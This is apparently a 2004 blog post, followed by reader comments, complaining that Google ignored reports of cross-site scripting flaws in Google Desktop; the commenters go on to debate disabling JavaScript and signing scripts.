Trying google security again.
Well the Google fix didn’t fix all the original issues I reported, I didn’t mention them in the exploit page as they only apply to a few minority browsers, but they’re there - so I’m trying security@google.com again again, this time copying in two people at google who got in touch.
Not that I hold out much hope, the Google security guy hasn’t responded in the last 5 days to my simple request of how to actually report flaws since the email address doesn’t work (and I’ve heard from two other people who have had a similar lack of response after emailing them)
Hopefully Google will start responding and taking security reports seriously, I don’t hold out much hope, but if the flaws that exist in google desktop are made public, Google won’t be able to get it fixed in hours, people will be stuck with the old flawed, exploitable versions of Google Desktop they have now. If you’ve still got Google Desktop, Uninstall it now!.
Oh actually it looks like Salvatore Aranzulla has already publicised the Google Desktop flaw - whilst not quite the same as the one I found, it comes from the same root cause - Google developers writing untrusted data from the querystring straight into the page without encoding it.
Google, stop releasing products, get all your developers into a room, get some good developers who understand Security to explain it to everyone. Then review all your code and sites, get some tests written, get defensive and sort your security out now, before exploits start actually getting used. At the moment it’s ridiculously easy to find exploits in Google, and they don’t seem to be taking it seriously.
Users - uninstall Google Desktop, make Google a “Restricted site” in IE so script is disabled go to “tools - security - restricted sites” and add *.google.com, other browser users do the same, and start looking for different search or email solutions.
November 30th, 1999 at 12:00 am
Puzzled_bear,
I agree, if a site doesn’t work without javascript it’s broken, but even the best authored sites - their users like what javascript can offer, I’ve done some basic userbility studies in this area, and they much prefer the minimised round-trips etc. So whilst I of course agree that they’re broken if they don’t work, that doesn’t mean users are willing to forego those enhancements.
You are obviously qualified to make the decision - you understand “javascript” which is more than most. The problems are two fold, users don’t know that ebay.hackersite.com and ebay.com are different sites if they look the same - the success of phishers show this, so following from that they equally won’t know that “trust scripts from ebay.hackersite.com signed by Joe Hacker” isn’t ebay asking. To make decisions you need to be aware of the consequences, the decision you’re suggesting users make as far as their concerned “this site work” or “this site deosn’t work” - they’re going to choose work, because they don’t know enough of the tisks.
Next we have the problem of XSS insertion flaws (or the why google desktop flaw is a problem) - here, the users will trust google, they’ll have ticked all the trust boxes, which is why XSS removes the ability of even the conscientious from choosing who to trust. Signed scripts could maybe solve the XSS solutions (but I can think of no reasonable way to sign script in an intrinsic event) but they incompatible with all the current server solutions - the loss of ability to sign dynamic scripts being the problem - for these reasons the solutions you propose are so long term as to me to just be a pipe dream, and we should focus on what can be achieved today.
October 26th, 2004 at 4:34 pm
Anybody with an iota of security cluefullness isn’t using IE and has javascript disabled already. Those that are browsing the web with script enabled IE, well, google is the least of their problems.
October 26th, 2004 at 5:30 pm
Thanks for warning me. Google Desktop is hereby uninstalled.
October 26th, 2004 at 5:54 pm
puzzled_bear, the exploit doesn’t just apply to IE, it applies to all script capable user agents, you can be sitting their thinking FireFox or Safari is immune, but it’s not, googles letting the script run there too. The problem is googles, if script gets in the page, the browser executes it, any browser.
October 27th, 2004 at 12:23 pm
Jim, I know that and I think google should fix the issue. I also think the javascript issue should be fixed on a permament basis, by shipping UA’s with script fully disabled by default.
I assure you no browser I run executes script from anywhere other than installed components and extensions ;-)
October 27th, 2004 at 2:35 pm
Oh right, puzzled bear, so your comments weren’t really about IE, but about default enabled scripting, something which applies to every script capable UA - have you tried posting a Mozilla enhancement request about this?
In any case, it will not work, javascript is too important to too many websites, all it will do is turn users to a browser that does enable javascript by default, or you’re going to have to have some silly “X wants to execute script on this site” model which doesn’t work simply because users are not qualified to make those decisions.
October 27th, 2004 at 10:20 pm
To think Brin and Page were once the darlings of the Internet!
October 28th, 2004 at 9:49 pm
Google pioneered the eternal cookie which reported all the results of google searches. But of course that was just for their own statistical aid in developing a better product for YOU, the dear valued customer.
Google has not explained just exactly what its Gov’t contracts for tracking and recording browser usage are. But of course confidentiality clauses in the contract doesn’t allow for such revelation.
Google has a desktop program that searches your computer and leaves the results around to be read by those who know how. But of course it’s a mere oversight in the very complex code.
Google is one of the great Good Guys of the Internet. But of course.
October 30th, 2004 at 10:15 pm
“javascript is too important to too many websites”
If a site doesn’t offer basic functionality without javascript, it’s broken. period.
“users are not qualified to make those decisions”
I am, and I did long ago. If we need to digitally sign javascripts, only allow event handlers in document bodies and toggle a per-site “trust signed scripts from ${DOMAIN}” flag once; then I’m all for it. Allow lists could probably even be syndicated for proxies, content filters and home security products.
Since ‘users are stupid’, there’s probably no point in bothering with any of this. Afterall the majority of browser based exploits rely on script and these are no problem, despite the web browser being ubiquitous on every desktop machine. A hole in googles desktop search with it’s comparatively tiny number of installations however means the sky is falling.
** with apologies for the sarcasm, no offense intended **